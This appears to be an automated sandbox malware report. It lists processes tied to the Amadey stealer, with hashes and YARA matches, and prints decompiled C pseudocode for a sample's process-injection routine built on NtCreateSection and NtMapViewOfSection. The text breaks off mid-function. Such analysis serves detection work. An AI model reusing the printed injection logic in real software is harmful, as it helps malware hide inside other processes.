Commandline:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Imagebase:	0x1030000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000028.00000000.725994523.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000028.00000002.727223377.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: ohcompettitive.exePID: 5184, Parent PID: 5412

General

Target ID:	41
Start time:	01:35:34
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe
Imagebase:	0x2f4bca60000
File size:	15'360 bytes
MD5 hash:	4D5F7960D715A6C04F1388FB49521F81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira

Show Windows behavior

Chronological Activities

Analysis Process: pdates.exePID: 5620, Parent PID: 1084

General

Target ID:	42
Start time:	01:36:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Imagebase:	0x1030000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 0000002A.00000000.854696762.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 0000002A.00000002.855768212.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: q4B165cujP.exePID: 5584, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	66.7%
Total number of Nodes:	54
Total number of Limit Nodes:	1

Executed Functions

Function 004014F4 Relevance: 10.7, APIs: 7, Instructions: 232
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID:
API String ID: 3132048701-0
Opcode ID: c988dd570ec20032adcf290d7ebd961c5d4c8640c6293f2ff06a95f44cf7e08f
Instruction ID: 294d62bcad071cdbf7ac5b63dbb7556f550064bbbd5c7ae849e1746ab3fd80ab
Opcode Fuzzy Hash: c988dd570ec20032adcf290d7ebd961c5d4c8640c6293f2ff06a95f44cf7e08f
Instruction Fuzzy Hash: A071C171900244FFEB209F91CC49FAB7FB8EF82710F14416AF952BA2E5D2789901DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E0040151E(intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* _v288;
				void* __edi;
				void* __esi;
				intOrPtr _t59;
				intOrPtr _t62;
				struct _GUID _t68;
				struct _GUID _t70;
				PVOID* _t72;
				PVOID* _t74;
				PVOID* _t78;
				PVOID* _t80;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				HANDLE* _t108;
				HANDLE* _t109;
				intOrPtr _t113;
				intOrPtr* _t114;
				void* _t118;
				long _t132;

				_push(_t103);
				_push(0x395);
				_t85 =  *_t114;
				_t95 = 0x84;
				L004011B1(0x156b, _t85, _t95, _t103, _t105, _t118);
				_t84 = _a4;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t59 =  *((intOrPtr*)(_t84 + 0x48))();
					if(_t59 != 0) {
						break;
					}
					 *((intOrPtr*)(_t84 + 0x1c))(0x3e8);
					asm("invalid");
				}
				_v96 = _t59;
				_t106 =  &_v100;
				 *_t106 = 0;
				 *((intOrPtr*)(_t84 + 0x4c))(_t59, _t106);
				_t62 =  *_t106;
				if(_t62 == 0) {
					L49:
					_push(0x156b);
					_push(0x395);
					__ecx =  *__esp;
					__esp = __esp + 4;
					__edx =  *__esp;
					__esp = __esp + 4;
					__eax = L004011B1(__eax, __ecx, __edx, __edi, __esi, __eflags);
					__edi = 0x84;
					return __eax;
				} else {
					_t86 =  &_v52;
					 *_t86 = _t62;
					 *((intOrPtr*)(_t86 + 4)) = 0;
					_t107 =  &_v44;
					 *((intOrPtr*)(_t84 + 0x10))(_t107, 0x18);
					 *_t107 = 0x18;
					_push( &_v52);
					_push(_t107);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t84 + 0x70))() != 0 || NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, 0, 0, 2) != 0) {
						goto L49;
					} else {
						_v12 = 0;
						_t68 =  &_v84;
						 *((intOrPtr*)(_t68 + 4)) = 0;
						 *_t68 = 0x5000;
						_t108 =  &_v88;
						if(NtCreateSection(_t108, 6, 0, _t68, 4, 0x8000000, 0) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t78 =  &_v72;
							 *_t78 = 0;
							if(NtMapViewOfSection( *_t108, 0xffffffff, _t78, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
								_t80 =  &_v64;
								 *_t80 = 0;
								if(NtMapViewOfSection( *_t108, _v16, _t80, 0, 0, 0,  &_v60, 1, 0, 4) == 0) {
									_t113 = _v72;
									 *((intOrPtr*)(_t84 + 0x20))(0, _t113, 0x104);
									 *((intOrPtr*)(_t113 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t70 =  &_v84;
						 *((intOrPtr*)(_t70 + 4)) = 0;
						 *_t70 = _a12 + 0x10000;
						_t109 =  &_v92;
						if(NtCreateSection(_t109, 0xe, 0, _t70, 0x40, 0x8000000, 0) != 0 || _v12 == 0) {
							goto L49;
						} else {
							_push(_v84);
							_pop( *_t46);
							_t72 =  &_v76;
							 *_t72 = 0;
							if(NtMapViewOfSection( *_t109, 0xffffffff, _t72, 0, 0, 0,  &_v60, 1, 0, 4) != 0) {
								goto L49;
							} else {
								_t74 =  &_v68;
								 *_t74 = 0;
								_t132 = NtMapViewOfSection( *_t109, _v16, _t74, 0, 0, 0,  &_v60, 1, 0, 0x20);
								if(_t132 != 0) {
									goto L49;
								} else {
									L25();
									if(_t132 == 0 && _t132 != 0) {
										asm("rol ah, 1");
									}
									_push(0x2dfb);
									_t98 = 0x2260;
									_push(_t98);
									asm("lodsb");
									asm("loop 0xffffffc6");
								}
							}
						}
					}
				}
			}

0x00401526
0x00401541
0x00401546
0x0040155e
0x00401566
0x0040156b
0x00401570
0x00401579
0x0040157b
0x0040157b
0x0040157e
0x0040157e
0x00401583
0x00000000
0x00000000
0x004018ae
0x004018b5
0x004018b5
0x00401589
0x0040158c
0x0040158f
0x00401593
0x00401596
0x0040159a
0x004018a7
0x004018bc
0x004018d0
0x004018d5
0x004018d8
0x004018ee
0x004018f1
0x004018fb
0x00401900
0x00401904
0x004015a0
0x004015a0
0x004015a3
0x004015a5
0x004015a8
0x004015ae
0x004015b1
0x004015bf
0x004015c0
0x004015c1
0x004015c3
0x004015c9
0x00000000
0x004015ec
0x004015ec
0x004015ef
0x004015f2
0x004015f5
0x004015fb
0x00401610
0x00401612
0x00401615
0x00401618
0x0040161b
0x00401633
0x00401635
0x00401638
0x00401651
0x00401653
0x0040165d
0x00401663
0x00401669
0x00401669
0x00401651
0x00401633
0x0040166c
0x00401678
0x0040167b
0x0040167d
0x00401692
0x00000000
0x004016a2
0x004016a2
0x004016a5
0x004016a8
0x004016ab
0x004016c3
0x00000000
0x004016c9
0x004016c9
0x004016cc
0x004016e3
0x004016e5
0x00000000
0x004016eb
0x004016eb
0x004016f0
0x004016f4
0x004016f4
0x00401721
0x00401740
0x00401750
0x00401775
0x00401782
0x0040178b
0x004016e5
0x004016c3
0x00401692
0x004015c9

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040162E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040164C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040168D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016BE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E0

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ed05f050021b50fb19d95e9036f905f596106a3efbbc094f8255f56080a08c00
Instruction ID: 7f6685667ee18e25be07774116bd2dce249f869187c90d88b84624711bc70c76
Opcode Fuzzy Hash: ed05f050021b50fb19d95e9036f905f596106a3efbbc094f8255f56080a08c00
Instruction Fuzzy Hash: 65617271A00204FBEB209F95DC49FAF7BB8FF81B00F10412AF912BA1E4D6759A01DB65

Uniqueness

Uniqueness Score: -1.00%

Function 004014B5 Relevance: 10.7, APIs: 7, Instructions: 195
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: CreateDuplicateObjectSection
String ID:
API String ID: 3132048701-0
Opcode ID: ee37aac3f6e4432af36701d9fd18561bf1d612f37fd6f0089580959cc3ec3ada
Instruction ID: 199840dbe584bb18b5a82293c747b9eb62378b3460df89cf074b2b1c89b004de
Opcode Fuzzy Hash: ee37aac3f6e4432af36701d9fd18561bf1d612f37fd6f0089580959cc3ec3ada
Instruction Fuzzy Hash: A5617C71A00204BFEB208F91CC48FEF7BB8EF86710F10412AF912BA2E5D6759901DB25

Uniqueness

Uniqueness Score: -1.00%

Function 00401529 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401529() {
				intOrPtr _t60;
				intOrPtr _t63;
				struct _GUID _t69;
				struct _GUID _t71;
				PVOID* _t73;
				PVOID* _t75;
				PVOID* _t79;
				PVOID* _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t96;
				void* _t99;
				void* _t104;
				void* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				HANDLE* _t109;
				HANDLE* _t110;
				void* _t114;
				void* _t115;
				intOrPtr* _t116;
				void* _t120;
				long _t134;

				_push(0xce);
				asm("in al, dx");
				_push(0x395);
				_t86 =  *_t116;
				_t96 = 0x84;
				L004011B1(0x156b, _t86, _t96, _t104, _t106, _t120);
				_t85 =  *((intOrPtr*)(_t115 + 8));
				 *((intOrPtr*)(_t115 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t115 - 0x34)) =  *((intOrPtr*)(_t115 - 0x34)) + 1;
				}
				while(1) {
					_t60 =  *((intOrPtr*)(_t85 + 0x48))();
					if(_t60 != 0) {
						break;
					}
					 *((intOrPtr*)(_t85 + 0x1c))(0x3e8);
					asm("invalid");
				}
				 *((intOrPtr*)(_t115 - 0x5c)) = _t60;
				_t107 = _t115 - 0x60;
				 *_t107 = 0;
				 *((intOrPtr*)(_t85 + 0x4c))(_t60, _t107);
				_t63 =  *_t107;
				if(_t63 == 0) {
					L47:
					__ecx =  *__esp;
					__esp = __esp + 4;
					__edx =  *__esp;
					__esp = __esp + 4;
					__eax = L004011B1(__eax, __ecx, __edx, __edi, __esi, __eflags);
					__edi = 0x84;
					__esi = 0x395;
					__esp = __ebp;
					__ebp = 0x156b;
					return __eax;
				} else {
					_t87 = _t115 - 0x30;
					 *_t87 = _t63;
					 *((intOrPtr*)(_t87 + 4)) = 0;
					_t108 = _t115 - 0x28;
					 *((intOrPtr*)(_t85 + 0x10))(_t108, 0x18);
					 *_t108 = 0x18;
					_push(_t115 - 0x30);
					_push(_t108);
					_push(0x40);
					_push(_t115 - 0x10);
					if( *((intOrPtr*)(_t85 + 0x70))() != 0 || NtDuplicateObject( *(_t115 - 0x10), 0xffffffff, 0xffffffff, _t115 - 0xc, 0, 0, 2) != 0) {
						goto L47;
					} else {
						 *((intOrPtr*)(_t115 - 8)) = 0;
						_t69 = _t115 - 0x50;
						 *((intOrPtr*)(_t69 + 4)) = 0;
						 *_t69 = 0x5000;
						_t109 = _t115 - 0x54;
						if(NtCreateSection(_t109, 6, 0, _t69, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t115 - 0x50);
							_t79 = _t115 - 0x44;
							 *_t79 = 0;
							if(NtMapViewOfSection( *_t109, 0xffffffff, _t79, 0, 0, 0, _t115 - 0x38, 1, 0, 4) == 0) {
								_t81 = _t115 - 0x3c;
								 *_t81 = 0;
								if(NtMapViewOfSection( *_t109,  *(_t115 - 0xc), _t81, 0, 0, 0, _t115 - 0x38, 1, 0, 4) == 0) {
									_t114 =  *(_t115 - 0x44);
									 *((intOrPtr*)(_t85 + 0x20))(0, _t114, 0x104);
									 *((intOrPtr*)(_t114 + 0x208)) =  *((intOrPtr*)(_t115 + 0x14));
									 *((intOrPtr*)(_t115 - 8)) =  *((intOrPtr*)(_t115 - 8)) + 1;
								}
							}
						}
						_t71 = _t115 - 0x50;
						 *((intOrPtr*)(_t71 + 4)) = 0;
						 *_t71 =  *((intOrPtr*)(_t115 + 0x10)) + 0x10000;
						_t110 = _t115 - 0x58;
						if(NtCreateSection(_t110, 0xe, 0, _t71, 0x40, 0x8000000, 0) != 0 ||  *((intOrPtr*)(_t115 - 8)) == 0) {
							goto L47;
						} else {
							 *_t46 =  *(_t115 - 0x50);
							_t73 = _t115 - 0x48;
							 *_t73 = 0;
							if(NtMapViewOfSection( *_t110, 0xffffffff, _t73, 0, 0, 0, _t115 - 0x38, 1, 0, 4) != 0) {
								goto L47;
							} else {
								_t75 = _t115 - 0x40;
								 *_t75 = 0;
								_t134 = NtMapViewOfSection( *_t110,  *(_t115 - 0xc), _t75, 0, 0, 0, _t115 - 0x38, 1, 0, 0x20);
								if(_t134 != 0) {
									goto L47;
								} else {
									L23();
									if(_t134 == 0 && _t134 != 0) {
										asm("rol ah, 1");
									}
									_push(0x2dfb);
									_t99 = 0x2260;
									_push(_t99);
									asm("lodsb");
									asm("loop 0xffffffc6");
								}
							}
						}
					}
				}
			}

0x0040152b
0x0040152c
0x00401541
0x00401546
0x0040155e
0x00401566
0x0040156b
0x00401570
0x00401579
0x0040157b
0x0040157b
0x0040157e
0x0040157e
0x00401583
0x00000000
0x00000000
0x004018ae
0x004018b5
0x004018b5
0x00401589
0x0040158c
0x0040158f
0x00401593
0x00401596
0x0040159a
0x004018a7
0x004018d5
0x004018d8
0x004018ee
0x004018f1
0x004018fb
0x00401900
0x00401901
0x00401903
0x00401903
0x00401904
0x004015a0
0x004015a0
0x004015a3
0x004015a5
0x004015a8
0x004015ae
0x004015b1
0x004015bf
0x004015c0
0x004015c1
0x004015c3
0x004015c9
0x00000000
0x004015ec
0x004015ec
0x004015ef
0x004015f2
0x004015f5
0x004015fb
0x00401610
0x00401615
0x00401618
0x0040161b
0x00401633
0x00401635
0x00401638
0x00401651
0x00401653
0x0040165d
0x00401663
0x00401669
0x00401669
0x00401651
0x00401633
0x0040166c
0x00401678
0x0040167b
0x0040167d
0x00401692
0x00000000
0x004016a2
0x004016a5
0x004016a8
0x004016ab
0x004016c3
0x00000000
0x004016c9
0x004016c9
0x004016cc
0x004016e3
0x004016e5
0x00000000
0x004016eb
0x004016eb
0x004016f0
0x004016f4
0x004016f4
0x00401721
0x00401740
0x00401750
0x00401775
0x00401782
0x0040178b
0x004016e5
0x004016c3
0x00401692
0x004015c9

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040162E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040164C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040168D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016BE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E0

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 67f5f20922a7d13f21447bf438d2240895963c18d5e7af44458f1e7c2fbd7986
Instruction ID: c705e71790d0506be3610082f77f18d1da7c912fb1c6ded9febf28eac8d2958e
Opcode Fuzzy Hash: 67f5f20922a7d13f21447bf438d2240895963c18d5e7af44458f1e7c2fbd7986
Instruction Fuzzy Hash: 1C510CB5900205BFEB209F91CC49FAF7BB8EF85700F14412AF911BA2E5D6759941DB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401534 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401534() {
				void* __edi;
				intOrPtr _t59;
				intOrPtr _t62;
				struct _GUID _t68;
				struct _GUID _t70;
				PVOID* _t72;
				PVOID* _t74;
				PVOID* _t78;
				PVOID* _t80;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				HANDLE* _t108;
				HANDLE* _t109;
				void* _t113;
				void* _t114;
				intOrPtr* _t115;
				void* _t119;
				long _t133;

				_push(es);
				_push(_t103);
				_push(0x395);
				_t85 =  *_t115;
				_t95 = 0x84;
				L004011B1(0x156b, _t85, _t95, _t103, _t105, _t119);
				_t84 =  *((intOrPtr*)(_t114 + 8));
				 *((intOrPtr*)(_t114 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t114 - 0x34)) =  *((intOrPtr*)(_t114 - 0x34)) + 1;
				}
				while(1) {
					_t59 =  *((intOrPtr*)(_t84 + 0x48))();
					if(_t59 != 0) {
						break;
					}
					 *((intOrPtr*)(_t84 + 0x1c))(0x3e8);
					asm("invalid");
				}
				 *((intOrPtr*)(_t114 - 0x5c)) = _t59;
				_t106 = _t114 - 0x60;
				 *_t106 = 0;
				 *((intOrPtr*)(_t84 + 0x4c))(_t59, _t106);
				_t62 =  *_t106;
				if(_t62 == 0) {
					L48:
					__ecx =  *__esp;
					__esp = __esp + 4;
					__edx =  *__esp;
					__esp = __esp + 4;
					__eax = L004011B1(__eax, __ecx, __edx, __edi, __esi, __eflags);
					__edi = 0x84;
					__esi = 0x395;
					__esp = __ebp;
					__ebp = 0x156b;
					return __eax;
				} else {
					_t86 = _t114 - 0x30;
					 *_t86 = _t62;
					 *((intOrPtr*)(_t86 + 4)) = 0;
					_t107 = _t114 - 0x28;
					 *((intOrPtr*)(_t84 + 0x10))(_t107, 0x18);
					 *_t107 = 0x18;
					_push(_t114 - 0x30);
					_push(_t107);
					_push(0x40);
					_push(_t114 - 0x10);
					if( *((intOrPtr*)(_t84 + 0x70))() != 0 || NtDuplicateObject( *(_t114 - 0x10), 0xffffffff, 0xffffffff, _t114 - 0xc, 0, 0, 2) != 0) {
						goto L48;
					} else {
						 *((intOrPtr*)(_t114 - 8)) = 0;
						_t68 = _t114 - 0x50;
						 *((intOrPtr*)(_t68 + 4)) = 0;
						 *_t68 = 0x5000;
						_t108 = _t114 - 0x54;
						if(NtCreateSection(_t108, 6, 0, _t68, 4, 0x8000000, 0) == 0) {
							 *_t25 =  *(_t114 - 0x50);
							_t78 = _t114 - 0x44;
							 *_t78 = 0;
							if(NtMapViewOfSection( *_t108, 0xffffffff, _t78, 0, 0, 0, _t114 - 0x38, 1, 0, 4) == 0) {
								_t80 = _t114 - 0x3c;
								 *_t80 = 0;
								if(NtMapViewOfSection( *_t108,  *(_t114 - 0xc), _t80, 0, 0, 0, _t114 - 0x38, 1, 0, 4) == 0) {
									_t113 =  *(_t114 - 0x44);
									 *((intOrPtr*)(_t84 + 0x20))(0, _t113, 0x104);
									 *((intOrPtr*)(_t113 + 0x208)) =  *((intOrPtr*)(_t114 + 0x14));
									 *((intOrPtr*)(_t114 - 8)) =  *((intOrPtr*)(_t114 - 8)) + 1;
								}
							}
						}
						_t70 = _t114 - 0x50;
						 *((intOrPtr*)(_t70 + 4)) = 0;
						 *_t70 =  *((intOrPtr*)(_t114 + 0x10)) + 0x10000;
						_t109 = _t114 - 0x58;
						if(NtCreateSection(_t109, 0xe, 0, _t70, 0x40, 0x8000000, 0) != 0 ||  *((intOrPtr*)(_t114 - 8)) == 0) {
							goto L48;
						} else {
							 *_t46 =  *(_t114 - 0x50);
							_t72 = _t114 - 0x48;
							 *_t72 = 0;
							if(NtMapViewOfSection( *_t109, 0xffffffff, _t72, 0, 0, 0, _t114 - 0x38, 1, 0, 4) != 0) {
								goto L48;
							} else {
								_t74 = _t114 - 0x40;
								 *_t74 = 0;
								_t133 = NtMapViewOfSection( *_t109,  *(_t114 - 0xc), _t74, 0, 0, 0, _t114 - 0x38, 1, 0, 0x20);
								if(_t133 != 0) {
									goto L48;
								} else {
									L24();
									if(_t133 == 0 && _t133 != 0) {
										asm("rol ah, 1");
									}
									_push(0x2dfb);
									_t98 = 0x2260;
									_push(_t98);
									asm("lodsb");
									asm("loop 0xffffffc6");
								}
							}
						}
					}
				}
			}

0x00401534
0x00401535
0x00401541
0x00401546
0x0040155e
0x00401566
0x0040156b
0x00401570
0x00401579
0x0040157b
0x0040157b
0x0040157e
0x0040157e
0x00401583
0x00000000
0x00000000
0x004018ae
0x004018b5
0x004018b5
0x00401589
0x0040158c
0x0040158f
0x00401593
0x00401596
0x0040159a
0x004018a7
0x004018d5
0x004018d8
0x004018ee
0x004018f1
0x004018fb
0x00401900
0x00401901
0x00401903
0x00401903
0x00401904
0x004015a0
0x004015a0
0x004015a3
0x004015a5
0x004015a8
0x004015ae
0x004015b1
0x004015bf
0x004015c0
0x004015c1
0x004015c3
0x004015c9
0x00000000
0x004015ec
0x004015ec
0x004015ef
0x004015f2
0x004015f5
0x004015fb
0x00401610
0x00401615
0x00401618
0x0040161b
0x00401633
0x00401635
0x00401638
0x00401651
0x00401653
0x0040165d
0x00401663
0x00401669
0x00401669
0x00401651
0x00401633
0x0040166c
0x00401678
0x0040167b
0x0040167d
0x00401692
0x00000000
0x004016a2
0x004016a5
0x004016a8
0x004016ab
0x004016c3
0x00000000
0x004016c9
0x004016c9
0x004016cc
0x004016e3
0x004016e5
0x00000000
0x004016eb
0x004016eb
0x004016f0
0x004016f4
0x004016f4
0x00401721
0x00401740
0x00401750
0x00401775
0x00401782
0x0040178b
0x004016e5
0x004016c3
0x00401692
0x004015c9

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015DE
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040160B
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040162E
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040164C
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040168D
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016BE
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E0

Memory Dump Source

Source File: 00000000.00000002.420517439.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420509222.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420525053.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.420531041.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q4B165cujP.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 3ff8a1de327168b4907db37ae996da76654207a6a9e49b19f8353f51d63b9b6c
Instruction ID: 113a188022d7dddd0631f58382a9844cb1402b5a6531f00970e0bd43b9a90a64
Opcode Fuzzy Hash: 3ff8a1de327168b4907db37ae996da76654207a6a9e49b19f8353f51d63b9b6c
Instruction Fuzzy Hash: 7D513BB5900205BBEB209F91CC48FAF7BB8FF85B00F14412AF912BA1E5D6759941DB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040153D Relevance: 10.7, APIs: 7, Instructions: 171
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E0040153D() {
				void* _t56;
				intOrPtr _t59;
				intOrPtr _t62;
				struct _GUID _t68;
				struct _GUID _t70;
				PVOID* _t72;
				PVOID* _t74;
				PVOID* _t78;
				PVOID* _t80;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				void* _t95;
				void* _t98;
				void* _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				HANDLE* _t108;
				HANDLE* _t109;
				void* _t113;
				void* _t114;
				intOrPtr* _t115;
				void* _t119;
				long _t133;

				asm("clc");
				_pop(ss);
				_push(0x395);
				_t85 =  *_t115;
				_t95 = 0x84;
